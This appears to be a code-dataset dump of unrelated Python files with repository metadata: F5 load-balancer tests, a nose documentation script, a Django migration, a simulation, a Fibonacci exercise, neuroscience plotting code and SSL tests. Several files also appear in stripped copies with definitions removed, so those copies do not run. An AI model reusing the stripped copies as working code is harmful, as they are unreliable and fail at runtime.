'APP_COOKIE' pool.add() self._mock_BigIp.return_value.virtual_server.add_profile.assert_called_with( folder='tenant', name='vip', profile_name='/Common/http') self._mock_BigIp.return_value.virtual_server.set_persist_profile.assert_called_with( folder='tenant', name='vip', profile_name='/Common/cookie') # Test with persistence_type = APP_COOKIE, lb_method = SOURCE_IP self._mock_BigIp.reset_mock() pool.params['loadbalancer_method'] = 'SOURCE_IP' pool.add() self._mock_BigIp.return_value.pool.set_lb_method.assert_called_with( folder='tenant', lb_method='SOURCE_IP', name='test-lb-pool') self._mock_BigIp.return_value.virtual_server.add_profile.assert_called_with( folder='tenant', name='vip', profile_name='/Common/http') self._mock_BigIp.return_value.virtual_server.set_persist_profile.assert_called_with( folder='tenant', name='vip', profile_name='/Common/cookie') 
self._mock_BigIp.return_value.virtual_server.set_fallback_persist_profile.assert_called_with( folder='tenant', name='vip', profile_name='/Common/source_addr') # Test with persistence_type = APP_COOKIE, lb_method = SOURCE_IP, # persistence_cookie_name = 'DumpKookie' self._mock_BigIp.reset_mock() vip.params['persistence_cookie_name'] = 'DumpKookie' pool.add() self._mock_BigIp.return_value.virtual_server.add_profile.assert_called_with( folder='tenant', name='vip', profile_name='/Common/http') self._mock_BigIp.return_value.rule.create.assert_called_with( folder='tenant', name='app_cookie_vip', rule_definition='when HTTP_REQUEST {\n if { [HTTP::cookie DumpKookie] ne "" }{\n persist uie [string tolower [HTTP::cookie "DumpKookie"]] 3600\n }\n}\n\nwhen HTTP_RESPONSE {\n if { [HTTP::cookie "DumpKookie"] ne "" }{\n persist add uie [string tolower [HTTP::cookie "DumpKookie"]] 3600\n }\n}\n\n') self._mock_BigIp.return_value.virtual_server.create_uie_profile.assert_called_with( folder='tenant', name='app_cookie_vip', rule_name='app_cookie_vip') self._mock_BigIp.return_value.virtual_server.set_persist_profile.assert_called_with( folder='tenant', name='vip', profile_name='app_cookie_vip') self._mock_BigIp.return_value.virtual_server.set_fallback_persist_profile.assert_called_with( folder='tenant', name='vip', profile_name='/Common/source_addr') self._mock_BigIp.reset_mock() # Cleanup for i in range(2): config_db.LoadbalancerMemberSM.delete('member_'+str(i)) config_db.LoadbalancerPoolSM.delete('test-lb-pool') config_db.VirtualIpSM.delete('vip') # end test_update_vip_persistance_type def test_update_hm(self): project = self.create_project("fake-project", "project") vip = self.create_vip('vip', project) pool = self.create_pool("test-lb-pool", "default-domain:admin:test-lb-pool", project, vip) hm_obj = self.create_hm_obj("test-hm") hm_obj['loadbalancer_pool_back_refs']=[{'uuid': pool.uuid}] hm = config_db.HealthMonitorSM.locate(hm_obj['uuid'], hm_obj) self.create_pool_members("test-lb-pool", 2) pool.add() self._mock_BigIp.reset_mock() hm_obj['loadbalancer_healthmonitor_properties']['max_retries'] = '100' config_db.HealthMonitorSM.update(hm, hm_obj) pool.add() self._mock_BigIp.return_value.monitor.set_interval.assert_called_with( folder='tenant', interval='5', mon_type='HTTP', name='test-hm') self._mock_BigIp.return_value.monitor.set_timeout.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', timeout=200) self._mock_BigIp.return_value.monitor.set_send_string.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', send_text='GET / HTTP/1.0\\r\\n\\r\\n') self._mock_BigIp.return_value.monitor.set_recv_string.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', recv_text='HTTP/1\\.(0|1) 200') self._mock_BigIp.reset_mock() hm_obj['loadbalancer_healthmonitor_properties']['delay'] = '100' config_db.HealthMonitorSM.update(hm, hm_obj) pool.add() self._mock_BigIp.return_value.monitor.set_interval.assert_called_with( folder='tenant', interval='100', mon_type='HTTP', name='test-hm') self._mock_BigIp.return_value.monitor.set_timeout.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', timeout=200) self._mock_BigIp.return_value.monitor.set_send_string.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', send_text='GET / HTTP/1.0\\r\\n\\r\\n') self._mock_BigIp.return_value.monitor.set_recv_string.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', recv_text='HTTP/1\\.(0|1) 200') self._mock_BigIp.reset_mock() 
hm_obj['loadbalancer_healthmonitor_properties']['expected_codes'] = '401' config_db.HealthMonitorSM.update(hm, hm_obj) pool.add() self._mock_BigIp.return_value.monitor.set_interval.assert_called_with( folder='tenant', interval='100', mon_type='HTTP', name='test-hm') self._mock_BigIp.return_value.monitor.set_timeout.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', timeout=200) self._mock_BigIp.return_value.monitor.set_send_string.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', send_text='GET / HTTP/1.0\\r\\n\\r\\n') self._mock_BigIp.return_value.monitor.set_recv_string.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', recv_text='HTTP/1\\.(0|1) 401') self._mock_BigIp.reset_mock() hm_obj['loadbalancer_healthmonitor_properties']['timeout'] = '10' config_db.HealthMonitorSM.update(hm, hm_obj) pool.add() self._mock_BigIp.return_value.monitor.set_interval.assert_called_with( folder='tenant', interval='100', mon_type='HTTP', name='test-hm') self._mock_BigIp.return_value.monitor.set_timeout.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', timeout=1000) self._mock_BigIp.return_value.monitor.set_send_string.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', send_text='GET / HTTP/1.0\\r\\n\\r\\n') self._mock_BigIp.return_value.monitor.set_recv_string.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', recv_text='HTTP/1\\.(0|1) 401') self._mock_BigIp.reset_mock() hm_obj['loadbalancer_healthmonitor_properties']['url_path'] = '/status-check' config_db.HealthMonitorSM.update(hm, hm_obj) pool.add() self._mock_BigIp.return_value.monitor.set_interval.assert_called_with( folder='tenant', interval='100', mon_type='HTTP', name='test-hm') self._mock_BigIp.return_value.monitor.set_timeout.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', timeout=1000) self._mock_BigIp.return_value.monitor.set_send_string.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', send_text='GET /status-check HTTP/1.0\\r\\n\\r\\n') self._mock_BigIp.return_value.monitor.set_recv_string.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', recv_text='HTTP/1\\.(0|1) 401') self._mock_BigIp.reset_mock() hm_obj['loadbalancer_healthmonitor_properties']['monitor_type'] = 'PING' config_db.HealthMonitorSM.update(hm, hm_obj) pool.add() self._mock_BigIp.return_value.monitor.set_interval.assert_called_with( folder='tenant', interval='100', mon_type='PING', name='test-hm') self._mock_BigIp.return_value.monitor.set_timeout.assert_called_with( folder='tenant', mon_type='PING', name='test-hm', timeout=1000) self._mock_BigIp.reset_mock() # Cleanup for i in range(2): config_db.LoadbalancerMemberSM.delete('member_'+str(i)) config_db.LoadbalancerPoolSM.delete('test-lb-pool') config_db.VirtualIpSM.delete('vip') config_db.HealthMonitorSM.delete('test-hm') # end test_add_delete_pool_with_members_vip_hm def test_add_delete_multiple_pools(self): project = self.create_project("fake-project", "project") vip = self.create_vip('vip', project) pool = self.create_pool("test-lb-pool", "default-domain:admin:test-lb-pool", project, vip) pool.add() vip_1 = self.create_vip('vip_1', project) pool_1 = self.create_pool("test-lb-pool_1", "default-domain:admin:test-lb-pool_1", project, vip_1) pool_1.add() self.assertEqual(len(self._db), 2) self.assertEqual(len(self.lb_agent._loadbalancer_driver['f5'].project_list), 1) self.assertEqual(len(self.lb_agent._loadbalancer_driver['f5'].project_list['tenant']), 2) 
self.assertEqual(self.lb_agent._loadbalancer_driver['f5'].project_list['tenant'], set(['test-lb-pool', 'test-lb-pool_1'])) # Cleanup config_db.LoadbalancerPoolSM.delete('test-lb-pool') config_db.VirtualIpSM.delete('vip') self.assertFalse(self._mock_BigIp.return_value.system.delete_folder.called) self.assertEqual(len(self._db), 1) self.assertEqual(len(self.lb_agent._loadbalancer_driver['f5'].project_list), 1) self.assertEqual(len(self.lb_agent._loadbalancer_driver['f5'].project_list['tenant']), 1) self.assertEqual(self.lb_agent._loadbalancer_driver['f5'].project_list['tenant'], set(['test-lb-pool_1'])) # Cleanup config_db.LoadbalancerPoolSM.delete('test-lb-pool_1') config_db.VirtualIpSM.delete('vip_1') self.assertTrue(self._mock_BigIp.return_value.system.delete_folder.called) self.assertEqual(len(self._db), 0) self.assertEqual(len(self.lb_agent._loadbalancer_driver['f5'].project_list), 0) # end test_add_delete_multiple_pools #end F5LBTest(unittest.TestCase):
42,768
13
777
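The test suite in the record above relies heavily on two unittest.mock patterns: side_effect-backed fakes (e.g. the in-memory pool_driver_info_* store) and comparing call_args_list against an expected list of mock.call objects. A self-contained sketch of both patterns, using the standard-library unittest.mock rather than the older external mock package; the "driver" object and its methods are purely illustrative:

    import unittest
    from unittest import mock


    class MockPatternsTest(unittest.TestCase):
        def test_side_effect_and_call_list(self):
            store = {}

            def put(key, value):
                store[key] = value

            def get(key):
                return store.get(key)

            # side_effect routes calls to the fake in-memory store.
            driver = mock.Mock()
            driver.put = mock.Mock(side_effect=put)
            driver.get = mock.Mock(side_effect=get)

            driver.put('pool-1', {'members': 2})
            self.assertEqual(driver.get('pool-1'), {'members': 2})

            # Same style as the expected_calls_to_* assertions above.
            expected = [mock.call('pool-1', {'members': 2})]
            self.assertEqual(driver.put.call_args_list, expected)


    if __name__ == '__main__':
        unittest.main()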
c50ba6b8e1ade4d4df84686b6b1fc92c6b818a1b
2,307
py
Python
vendor-local/src/python-nose/scripts/mkindex.py
mozilla/sheriffs
9e3a837e0115252e01c9bcd5c9d56d11af760875
[ "BSD-3-Clause" ]
null
null
null
vendor-local/src/python-nose/scripts/mkindex.py
mozilla/sheriffs
9e3a837e0115252e01c9bcd5c9d56d11af760875
[ "BSD-3-Clause" ]
null
null
null
vendor-local/src/python-nose/scripts/mkindex.py
mozilla/sheriffs
9e3a837e0115252e01c9bcd5c9d56d11af760875
[ "BSD-3-Clause" ]
1
2019-11-02T23:29:13.000Z
2019-11-02T23:29:13.000Z
#!/usr/bin/env python from docutils.core import publish_string, publish_parts from docutils.readers.standalone import Reader from nose.config import Config from nose.plugins.manager import BuiltinPluginManager import nose import nose.commands import nose.tools import os import re import time doc_word.priority = 100 root = os.path.abspath(os.path.join(os.path.dirname(__file__), '..')) print "Main..." tpl = open(os.path.join(root, 'index.html.tpl'), 'r').read() pat = re.compile(r'^.*(Basic usage)', re.DOTALL) txt = nose.__doc__.replace(':: python','::') txt = pat.sub(r'\1', txt) # cut from 'about the name' down (goes to end of page) pat = re.compile(r'^(.*?)(About the name.*$)', re.DOTALL) txt, coda = pat.search(txt).groups() docs = publish_parts(txt, reader=DocReader(), writer_name='html') docs.update({'version': nose.__version__, 'date': time.ctime()}) docs['coda'] = publish_parts(coda, writer_name='html')['body'] #print "Tools..." #tools = publish_parts(nose.tools.__doc__, writer_name='html') #docs['tools'] = tools['body'] print "Commands..." cmds = publish_parts(nose.commands.__doc__, reader=DocReader(), writer_name='html') docs['commands'] = cmds['body'] print "Changelog..." changes = open(os.path.join(root, 'CHANGELOG'), 'r').read() changes_html = publish_parts(changes, reader=DocReader(), writer_name='html') docs['changelog'] = changes_html['body'] print "News..." news = open(os.path.join(root, 'NEWS'), 'r').read() news_html = publish_parts(news, reader=DocReader(), writer_name='html') docs['news'] = news_html['body'] print "Usage..." conf = Config(plugins=BuiltinPluginManager()) usage_txt = conf.help(nose.main.__doc__).replace( 'mkindex.py', 'nosetests') docs['usage'] = '<pre>%s</pre>' % usage_txt out = tpl % docs index = open(os.path.join(root, 'index.html'), 'w') index.write(out) index.close() readme = open(os.path.join(root, 'README.txt'), 'w') readme.write(nose.__doc__) readme.close()
28.8375
77
0.674902
#!/usr/bin/env python from docutils.core import publish_string, publish_parts from docutils.readers.standalone import Reader from nose.config import Config from nose.plugins.manager import BuiltinPluginManager import nose import nose.commands import nose.tools import os import re import time def doc_word(node): print "Unknown ref %s" % node.astext() node['refuri'] = 'doc/' \ + '_'.join(map(lambda s: s.lower(), node.astext().split(' '))) \ + '.html' del node['refname'] node.resolved = True return True doc_word.priority = 100 class DocReader(Reader): unknown_reference_resolvers = (doc_word,) root = os.path.abspath(os.path.join(os.path.dirname(__file__), '..')) print "Main..." tpl = open(os.path.join(root, 'index.html.tpl'), 'r').read() pat = re.compile(r'^.*(Basic usage)', re.DOTALL) txt = nose.__doc__.replace(':: python','::') txt = pat.sub(r'\1', txt) # cut from 'about the name' down (goes to end of page) pat = re.compile(r'^(.*?)(About the name.*$)', re.DOTALL) txt, coda = pat.search(txt).groups() docs = publish_parts(txt, reader=DocReader(), writer_name='html') docs.update({'version': nose.__version__, 'date': time.ctime()}) docs['coda'] = publish_parts(coda, writer_name='html')['body'] #print "Tools..." #tools = publish_parts(nose.tools.__doc__, writer_name='html') #docs['tools'] = tools['body'] print "Commands..." cmds = publish_parts(nose.commands.__doc__, reader=DocReader(), writer_name='html') docs['commands'] = cmds['body'] print "Changelog..." changes = open(os.path.join(root, 'CHANGELOG'), 'r').read() changes_html = publish_parts(changes, reader=DocReader(), writer_name='html') docs['changelog'] = changes_html['body'] print "News..." news = open(os.path.join(root, 'NEWS'), 'r').read() news_html = publish_parts(news, reader=DocReader(), writer_name='html') docs['news'] = news_html['body'] print "Usage..." conf = Config(plugins=BuiltinPluginManager()) usage_txt = conf.help(nose.main.__doc__).replace( 'mkindex.py', 'nosetests') docs['usage'] = '<pre>%s</pre>' % usage_txt out = tpl % docs index = open(os.path.join(root, 'index.html'), 'w') index.write(out) index.close() readme = open(os.path.join(root, 'README.txt'), 'w') readme.write(nose.__doc__) readme.close()
231
49
46
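The mkindex.py record above builds its HTML fragments with docutils' publish_parts. A tiny standalone sketch of that call, with a made-up reStructuredText input; the 'body' key and writer_name='html' behaviour are standard docutils:

    from docutils.core import publish_parts

    source = """Example
    =======

    A *small* reStructuredText snippet.
    """

    parts = publish_parts(source, writer_name='html')
    # 'body' is the HTML fragment that mkindex.py substitutes into its template.
    print(parts['body'])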
270ee543b329ffc1200cf23a84edbb417e93fe3f
722
py
Python
biserici_inlemnite/app/migrations/0012_descrierepage_gabarit_exterior_al_talpilor.py
ck-tm/biserici-inlemnite
c9d12127b92f25d3ab2fcc7b4c386419fe308a4e
[ "MIT" ]
null
null
null
biserici_inlemnite/app/migrations/0012_descrierepage_gabarit_exterior_al_talpilor.py
ck-tm/biserici-inlemnite
c9d12127b92f25d3ab2fcc7b4c386419fe308a4e
[ "MIT" ]
null
null
null
biserici_inlemnite/app/migrations/0012_descrierepage_gabarit_exterior_al_talpilor.py
ck-tm/biserici-inlemnite
c9d12127b92f25d3ab2fcc7b4c386419fe308a4e
[ "MIT" ]
null
null
null
# Generated by Django 3.1.13 on 2021-09-21 15:33 from django.db import migrations, models import django.db.models.deletion
34.380952
240
0.695291
# Generated by Django 3.1.13 on 2021-09-21 15:33 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('wagtailimages', '0023_add_choose_permissions'), ('app', '0011_remove_descrierepage_gabarit_exterior_al_talpilor'), ] operations = [ migrations.AddField( model_name='descrierepage', name='gabarit_exterior_al_talpilor', field=models.ForeignKey(blank=True, help_text='o schiță a planului tălpilor / elevației / turnului / triunghiului șarpantei', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.image'), ), ]
0
579
23
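The migration in the record above adds a nullable ForeignKey to wagtailimages.Image with SET_NULL deletion. A hypothetical model-side sketch of the same field (the DescrierePage base class and everything except the relation settings and help_text are assumptions; in the real app this is likely a Wagtail Page subclass):

    from django.db import models


    class DescrierePage(models.Model):
        gabarit_exterior_al_talpilor = models.ForeignKey(
            'wagtailimages.Image',
            null=True,
            blank=True,
            on_delete=models.SET_NULL,
            related_name='+',
            help_text='o schiță a planului tălpilor / elevației / turnului / triunghiului șarpantei',
        )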
4e2e7c10c7e9a5d0b6ea8f2706b2f2759257445a
2,047
py
Python
examples/collectibles_simple.py
TheoLvs/westworld
7fb435f3a028ff3d3156bf2a023b44ee06aa9f8b
[ "MIT" ]
null
null
null
examples/collectibles_simple.py
TheoLvs/westworld
7fb435f3a028ff3d3156bf2a023b44ee06aa9f8b
[ "MIT" ]
3
2021-09-06T23:12:23.000Z
2021-09-17T01:04:34.000Z
examples/collectibles_simple.py
TheoLvs/westworld
7fb435f3a028ff3d3156bf2a023b44ee06aa9f8b
[ "MIT" ]
null
null
null
"""Simulation where an agent will get all collectibles spawn randomly """ import sys sys.path.append("../") from westworld.environment import GridEnvironment from westworld.agents import BaseGridAgent from westworld.objects import BaseObstacle,BaseTrigger,BaseCollectible from westworld.simulation import Simulation from westworld.colors import * #================================================================================================== # BASE CLASSES #================================================================================================== #================================================================================================== # SIMULATION #================================================================================================== # Setup agents agent = Agent(1,1,color = RED) # Setup collectibles as random spawner collectible_spawner = lambda x,y : Collectible(x,y,color = WHITE) # Setup environment env = GridEnvironment(20,10,30,objects = [agent]) env.spawn(collectible_spawner,10) env.render() # Prepare simulation sim = Simulation(env,fps = 30,name="CollectiblesSimple") if __name__ == "__main__": sim.run_episode(n_steps = 200,save = True)
26.934211
99
0.50171
"""Simulation where an agent will get all collectibles spawn randomly """ import sys sys.path.append("../") from westworld.environment import GridEnvironment from westworld.agents import BaseGridAgent from westworld.objects import BaseObstacle,BaseTrigger,BaseCollectible from westworld.simulation import Simulation from westworld.colors import * #================================================================================================== # BASE CLASSES #================================================================================================== class Agent(BaseGridAgent): def init(self): self.score = 0 self.target = None def step(self): # Safety check if self.target is not None: if self.target not in self.env._objects: self.target = None # Find next target if self.target is None: _,ids = self.find_closest(k = 1,condition = {"collectible":True}) if len(ids) == 0: self.env.finish_episode() else: stop = False self.target = ids[0] if not self.env.done: self.move_towards(obj = self.target,n = 10) class Collectible(BaseCollectible): def on_trigger(self,obj): obj.score += 1 obj.target = None #================================================================================================== # SIMULATION #================================================================================================== # Setup agents agent = Agent(1,1,color = RED) # Setup collectibles as random spawner collectible_spawner = lambda x,y : Collectible(x,y,color = WHITE) # Setup environment env = GridEnvironment(20,10,30,objects = [agent]) env.spawn(collectible_spawner,10) env.render() # Prepare simulation sim = Simulation(env,fps = 30,name="CollectiblesSimple") if __name__ == "__main__": sim.run_episode(n_steps = 200,save = True)
636
20
147
91da93d1a3454065294d6224dce2fef0ad33aa04
1,053
py
Python
gmit--exercise04--problem02--fibonacci-even-values-under-4million--code--20180224.py
g00364787/52167assessments
65318102196fbbf40b764cd189edc4e31963ecf5
[ "Apache-2.0" ]
null
null
null
gmit--exercise04--problem02--fibonacci-even-values-under-4million--code--20180224.py
g00364787/52167assessments
65318102196fbbf40b764cd189edc4e31963ecf5
[ "Apache-2.0" ]
null
null
null
gmit--exercise04--problem02--fibonacci-even-values-under-4million--code--20180224.py
g00364787/52167assessments
65318102196fbbf40b764cd189edc4e31963ecf5
[ "Apache-2.0" ]
null
null
null
# AUTHOR = PAUL KEARNEY # STUDENT ID = G00364787 # DATE = 2018-02-24 # # STUDENT ID = G00364787 # EXERCISE 04 # projectEuler problem 2 # references used # http://www.tutorialspoint.com/python/python_basic_operators.htm # https://www.tutorialspoint.com/python/python_strings.htm # https://stackoverflow.com/questions/9120059/odd-even-string-python # # function to calculate the FIBONACCI value for input value n def fib(n): """This function returns the nth Fibonacci number.""" i = 0 j = 1 n = n - 1 while n >= 0: i, j = j, i + j n = n - 1 return i # setup working storage num = 0 total = 0 result = 0 total = 0 ok = 1 opStr = "" # main routine while result < 4000000 and ok == 1: result = fib(num) if (result < 4000000): if (result %2 == 0 ): total = total+result else: ok = 0 num = num + 1 # program output to screen opStr = "The sum of the even numbers 'under' 4 million is "+ str(total) print(opStr)
21.06
73
0.595442
# AUTHOR = PAUL KEARNEY # STUDENT ID = G00364787 # DATE = 2018-02-24 # # STUDENT ID = G00364787 # EXERCISE 04 # projectEuler problem 2 # references used # http://www.tutorialspoint.com/python/python_basic_operators.htm # https://www.tutorialspoint.com/python/python_strings.htm # https://stackoverflow.com/questions/9120059/odd-even-string-python # # function to calculate the FIBONACCI value for input value n def fib(n): """This function returns the nth Fibonacci number.""" i = 0 j = 1 n = n - 1 while n >= 0: i, j = j, i + j n = n - 1 return i # setup working storage num = 0 total = 0 result = 0 total = 0 ok = 1 opStr = "" # main routine while result < 4000000 and ok == 1: result = fib(num) if (result < 4000000): if (result %2 == 0 ): total = total+result else: ok = 0 num = num + 1 # program output to screen opStr = "The sum of the even numbers 'under' 4 million is "+ str(total) print(opStr)
0
0
0
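The record above recomputes fib(n) from scratch on every loop iteration. As an alternative sketch of the same computation (sum of even Fibonacci values below 4,000,000), written for Python 3 with a single running pair:

    def even_fib_sum(limit=4_000_000):
        """Sum the even Fibonacci numbers strictly below `limit`."""
        total = 0
        a, b = 1, 2
        while a < limit:
            if a % 2 == 0:
                total += a
            a, b = b, a + b
        return total


    if __name__ == '__main__':
        print("The sum of the even Fibonacci numbers under 4 million is", even_fib_sum())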
16c23eeac2b96f412b198365c9cccb8c69ca1254
2,567
py
Python
tutorials/W3D4_DeepLearning1/solutions/W3D4_Tutorial3_Solution_fba5d745.py
liuxiaomiao123/NeuroMathAcademy
16a7969604a300bf9fbb86f8a5b26050ebd14c65
[ "CC-BY-4.0" ]
2
2020-07-03T04:39:09.000Z
2020-07-12T02:08:31.000Z
tutorials/W3D4_DeepLearning1/solutions/W3D4_Tutorial3_Solution_fba5d745.py
NinaHKivanani/course-content
3c91dd1a669cebce892486ba4f8086b1ef2e1e49
[ "CC-BY-4.0" ]
1
2020-06-22T22:57:03.000Z
2020-06-22T22:57:03.000Z
tutorials/W3D4_DeepLearning1/solutions/W3D4_Tutorial3_Solution_fba5d745.py
NinaHKivanani/course-content
3c91dd1a669cebce892486ba4f8086b1ef2e1e49
[ "CC-BY-4.0" ]
1
2021-03-29T21:08:26.000Z
2021-03-29T21:08:26.000Z
def plot_tuning_curve(resp, ori, ax=None): """Plot single neuron responses as a function of stimulus orientation Args: resp (numpy array): n_stimuli x n_neurons matrix with responses of each neuron whose tuning curve to plot. Can also be a 1D array of length n_stimuli to plot tuning curve of a single neuron. ori (numpy array): 1D array of length stimuli with orientations of each stimulus, in radians ax (matplotlib axes): axes onto which to plot """ if ax is None: ax = plt.gca() ax.plot(np.rad2deg(ori), resp, '.-') ax.set_xticks(np.linspace(-90, 90, 5)) ax.set_xlabel('stimulus orientation') ax.set_ylabel('neuron response') def plot_dim_reduction(resp, ori, ax=None): """Plot dimensionality-reduced population responses (using tSNE) Args: resp (numpy array): n_stimuli x n_neurons matrix with population responses ori (numpy array): 1D array of length stimuli with orientations of each stimulus, in radians ax (matplotlib axes): axes onto which to plot """ if ax is None: ax = plt.gca() # First do PCA to reduce dimensionality to 200 dimensions so that tSNE is faster resp_lowd = PCA(n_components=min(200, resp.shape[1])).fit_transform(resp) # Then do tSNE to reduce dimensionality to 2 dimensions resp_lowd = TSNE(n_components=2).fit_transform(resp_lowd) # Plot dimensionality-reduced population responses # on 2D axes, with each point colored by stimulus orientation scat = ax.scatter(resp_lowd[:, 0], resp_lowd[:, 1], c=np.rad2deg(ori), cmap='twilight') cbar = plt.colorbar(scat, ax=ax, label='stimulus orientation') ax.set_xlabel('dimension 1') ax.set_ylabel('dimension 2') ax.set_xticks([]) ax.set_yticks([]) # Aggregate all responses into one dict resp_dict = {} resp_dict['V1 data'] = resp_v1 for k, v in resp_model.items(): label = 'model\nlayer %s' % k resp_dict[label] = v # Plot tuning curves and dimensionality-reduced responses next to each other with plt.xkcd(): figsize = 4 fig, axs = plt.subplots(2, len(resp_dict), figsize=(len(resp_dict) * figsize, 2 * figsize)) for i, (label, resp) in enumerate(resp_dict.items()): axs[0, i].set_title('%s responses' % label) # Plot tuning curves of three random neurons ineurons = np.random.choice(resp.shape[1], 3, replace=False) # indices of three random neurons plot_tuning_curve(resp[:, ineurons], ori, axs[0, i]) # Plot dimensionality-reduced population responses plot_dim_reduction(resp, ori, axs[1, i]) plt.tight_layout() plt.show()
34.226667
99
0.706272
def plot_tuning_curve(resp, ori, ax=None): """Plot single neuron responses as a function of stimulus orientation Args: resp (numpy array): n_stimuli x n_neurons matrix with responses of each neuron whose tuning curve to plot. Can also be a 1D array of length n_stimuli to plot tuning curve of a single neuron. ori (numpy array): 1D array of length stimuli with orientations of each stimulus, in radians ax (matplotlib axes): axes onto which to plot """ if ax is None: ax = plt.gca() ax.plot(np.rad2deg(ori), resp, '.-') ax.set_xticks(np.linspace(-90, 90, 5)) ax.set_xlabel('stimulus orientation') ax.set_ylabel('neuron response') def plot_dim_reduction(resp, ori, ax=None): """Plot dimensionality-reduced population responses (using tSNE) Args: resp (numpy array): n_stimuli x n_neurons matrix with population responses ori (numpy array): 1D array of length stimuli with orientations of each stimulus, in radians ax (matplotlib axes): axes onto which to plot """ if ax is None: ax = plt.gca() # First do PCA to reduce dimensionality to 200 dimensions so that tSNE is faster resp_lowd = PCA(n_components=min(200, resp.shape[1])).fit_transform(resp) # Then do tSNE to reduce dimensionality to 2 dimensions resp_lowd = TSNE(n_components=2).fit_transform(resp_lowd) # Plot dimensionality-reduced population responses # on 2D axes, with each point colored by stimulus orientation scat = ax.scatter(resp_lowd[:, 0], resp_lowd[:, 1], c=np.rad2deg(ori), cmap='twilight') cbar = plt.colorbar(scat, ax=ax, label='stimulus orientation') ax.set_xlabel('dimension 1') ax.set_ylabel('dimension 2') ax.set_xticks([]) ax.set_yticks([]) # Aggregate all responses into one dict resp_dict = {} resp_dict['V1 data'] = resp_v1 for k, v in resp_model.items(): label = 'model\nlayer %s' % k resp_dict[label] = v # Plot tuning curves and dimensionality-reduced responses next to each other with plt.xkcd(): figsize = 4 fig, axs = plt.subplots(2, len(resp_dict), figsize=(len(resp_dict) * figsize, 2 * figsize)) for i, (label, resp) in enumerate(resp_dict.items()): axs[0, i].set_title('%s responses' % label) # Plot tuning curves of three random neurons ineurons = np.random.choice(resp.shape[1], 3, replace=False) # indices of three random neurons plot_tuning_curve(resp[:, ineurons], ori, axs[0, i]) # Plot dimensionality-reduced population responses plot_dim_reduction(resp, ori, axs[1, i]) plt.tight_layout() plt.show()
0
0
0
048379005b2b62f1b01faadba6f978d4f3ede30a
3,116
py
Python
tst/inet/ssl/ssl_suite.py
ivankravets/pumbaa
2a1869cc204e3128516ed6fa9f89529aedec1702
[ "MIT" ]
69
2016-09-04T18:36:18.000Z
2021-07-04T21:51:54.000Z
tst/inet/ssl/ssl_suite.py
ivankravets/pumbaa
2a1869cc204e3128516ed6fa9f89529aedec1702
[ "MIT" ]
42
2016-09-02T20:10:19.000Z
2020-07-01T05:54:01.000Z
tst/inet/ssl/ssl_suite.py
ivankravets/pumbaa
2a1869cc204e3128516ed6fa9f89529aedec1702
[ "MIT" ]
11
2016-09-29T14:33:23.000Z
2021-02-28T19:30:49.000Z
# # @section License # # The MIT License (MIT) # # Copyright (c) 2016-2017, Erik Moqvist # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation # files (the "Software"), to deal in the Software without # restriction, including without limitation the rights to use, copy, # modify, merge, publish, distribute, sublicense, and/or sell copies # of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # # This file is part of the Pumbaa project. # import harness from harness import assert_raises import ssl import socket import socket_stub TESTCASES = [ (test_print, "test_print"), (test_client, "test_client"), (test_server, "test_server") ]
30.252427
69
0.675225
# # @section License # # The MIT License (MIT) # # Copyright (c) 2016-2017, Erik Moqvist # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation # files (the "Software"), to deal in the Software without # restriction, including without limitation the rights to use, copy, # modify, merge, publish, distribute, sublicense, and/or sell copies # of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # # This file is part of the Pumbaa project. # import harness from harness import assert_raises import ssl import socket import socket_stub def test_print(): help(ssl) print(ssl) context = ssl.SSLContext(ssl.PROTOCOL_TLS) print(context) help(context) server_sock = socket.socket() ssl_server_sock = context.wrap_socket(server_sock) print(ssl_server_sock) help(ssl_server_sock) def test_client(): with open('server.crt', 'w') as f: f.write('foo') context = ssl.SSLContext(ssl.PROTOCOL_TLS) context.load_verify_locations(cafile="server.crt") context.set_verify_mode(ssl.CERT_REQUIRED) sock = socket.socket() sock.connect(('192.168.0.1', 8080)) ssl_sock = context.wrap_socket(sock) assert ssl_sock.get_server_hostname() == 'test_server' assert ssl_sock.cipher() == 